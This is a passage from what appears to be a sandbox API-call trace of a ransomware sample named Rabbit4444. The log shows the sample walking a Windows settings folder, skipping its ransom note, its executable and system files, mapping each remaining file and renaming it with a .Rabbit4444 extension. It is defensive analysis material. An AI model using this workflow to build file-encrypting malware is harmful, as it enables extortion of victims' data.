lpString2="boot") returned -1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.518] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAppsNotifications.settingcontent-ms" | out: lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms") returned="AAA_SettingsPageAppsNotifications.settingcontent-ms" [0056.518] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsNotifications.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.518] lstrlenW (lpString="AAA_SettingsPageAppsNotifications.settingcontent-ms") returned 51 [0056.518] lstrlenW (lpString="Rabbit4444") returned 10 [0056.518] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.518] lstrlenW (lpString=".dll") returned 4 [0056.518] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.518] lstrlenW (lpString=".lnk") returned 4 [0056.518] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.518] lstrlenW (lpString=".ini") returned 4 [0056.518] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.518] lstrlenW (lpString=".sys") returned 4 [0056.518] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsNotifications.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsnotifications.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.519] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.519] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14782933617) returned 1 [0056.519] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0056.519] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.520] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.521] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14783224595) returned 1 [0056.522] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.522] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0056.522] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.522] CloseHandle (hObject=0x298) returned 1 [0056.522] CloseHandle (hObject=0x278) returned 1 [0056.522] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsNotifications.settingcontent-ms.Rabbit4444") returned 179 [0056.522] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsNotifications.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsnotifications.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsNotifications.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsnotifications.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.523] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf89248d8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf89248d8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageBackground.settingcontent-ms", cAlternateFileName="AA064F~1.SET")) returned 1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2=".") returned 1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="..") returned 1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="windows") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="boot") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.523] lstrcmpiW (lpString1="AAA_SettingsPageBackground.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.523] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageBackground.settingcontent-ms" | out: lpString1="AAA_SettingsPageBackground.settingcontent-ms") returned="AAA_SettingsPageBackground.settingcontent-ms" [0056.523] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBackground.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.523] lstrlenW (lpString="AAA_SettingsPageBackground.settingcontent-ms") returned 44 [0056.523] lstrlenW (lpString="Rabbit4444") returned 10 [0056.523] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.523] lstrlenW (lpString=".dll") returned 4 [0056.523] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.523] lstrlenW (lpString=".lnk") returned 4 [0056.523] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.523] lstrlenW (lpString=".ini") returned 4 [0056.523] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.524] lstrlenW (lpString=".sys") returned 4 [0056.524] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.524] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBackground.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagebackground.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.524] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.524] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14783457106) returned 1 [0056.524] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1057) returned 1 [0056.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.524] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.526] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.527] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14783821944) returned 1 [0056.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.528] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.528] CloseHandle (hObject=0x298) returned 1 [0056.528] CloseHandle (hObject=0x278) returned 1 [0056.528] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBackground.settingcontent-ms.Rabbit4444") returned 172 [0056.528] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBackground.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagebackground.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBackground.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagebackground.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.528] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8cb810f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf8cb810f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageBatterySaver.settingcontent-ms", cAlternateFileName="AA8E4E~1.SET")) returned 1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2=".") returned 1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="..") returned 1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="windows") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="boot") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.529] lstrcmpiW (lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.529] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageBatterySaver.settingcontent-ms" | out: lpString1="AAA_SettingsPageBatterySaver.settingcontent-ms") returned="AAA_SettingsPageBatterySaver.settingcontent-ms" [0056.529] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBatterySaver.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.529] lstrlenW (lpString="AAA_SettingsPageBatterySaver.settingcontent-ms") returned 46 [0056.529] lstrlenW (lpString="Rabbit4444") returned 10 [0056.529] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.529] lstrlenW (lpString=".dll") returned 4 [0056.529] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.529] lstrlenW (lpString=".lnk") returned 4 [0056.529] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.529] lstrlenW (lpString=".ini") returned 4 [0056.529] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.529] lstrlenW (lpString=".sys") returned 4 [0056.529] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.529] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBatterySaver.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagebatterysaver.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.530] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.530] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14784041945) returned 1 [0056.530] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.530] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.530] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.530] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.531] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.532] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14784291725) returned 1 [0056.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.532] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.532] CloseHandle (hObject=0x298) returned 1 [0056.532] CloseHandle (hObject=0x278) returned 1 [0056.532] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBatterySaver.settingcontent-ms.Rabbit4444") returned 174 [0056.533] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBatterySaver.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagebatterysaver.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageBatterySaver.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagebatterysaver.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.533] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9130939, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf9130939, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageColors.settingcontent-ms", cAlternateFileName="AAB06B~1.SET")) returned 1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2=".") returned 1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="..") returned 1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="windows") returned -1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="boot") returned -1 [0056.533] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.534] lstrcmpiW (lpString1="AAA_SettingsPageColors.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.534] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageColors.settingcontent-ms" | out: lpString1="AAA_SettingsPageColors.settingcontent-ms") returned="AAA_SettingsPageColors.settingcontent-ms" [0056.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageColors.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.534] lstrlenW (lpString="AAA_SettingsPageColors.settingcontent-ms") returned 40 [0056.534] lstrlenW (lpString="Rabbit4444") returned 10 [0056.534] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.534] lstrlenW (lpString=".dll") returned 4 [0056.534] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.534] lstrlenW (lpString=".lnk") returned 4 [0056.534] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.534] lstrlenW (lpString=".ini") returned 4 [0056.534] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.534] lstrlenW (lpString=".sys") returned 4 [0056.534] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageColors.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagecolors.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.535] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.535] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14784534922) returned 1 [0056.535] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1037) returned 1 [0056.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0056.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.535] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0056.536] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0056.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.537] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14784801337) returned 1 [0056.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0056.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.537] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.537] CloseHandle (hObject=0x298) returned 1 [0056.538] CloseHandle (hObject=0x278) returned 1 [0056.538] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageColors.settingcontent-ms.Rabbit4444") returned 168 [0056.538] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageColors.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagecolors.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageColors.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagecolors.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.538] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9582be7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf9582be7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageDataSenseOverview.settingcontent-ms", cAlternateFileName="AAF001~1.SET")) returned 1 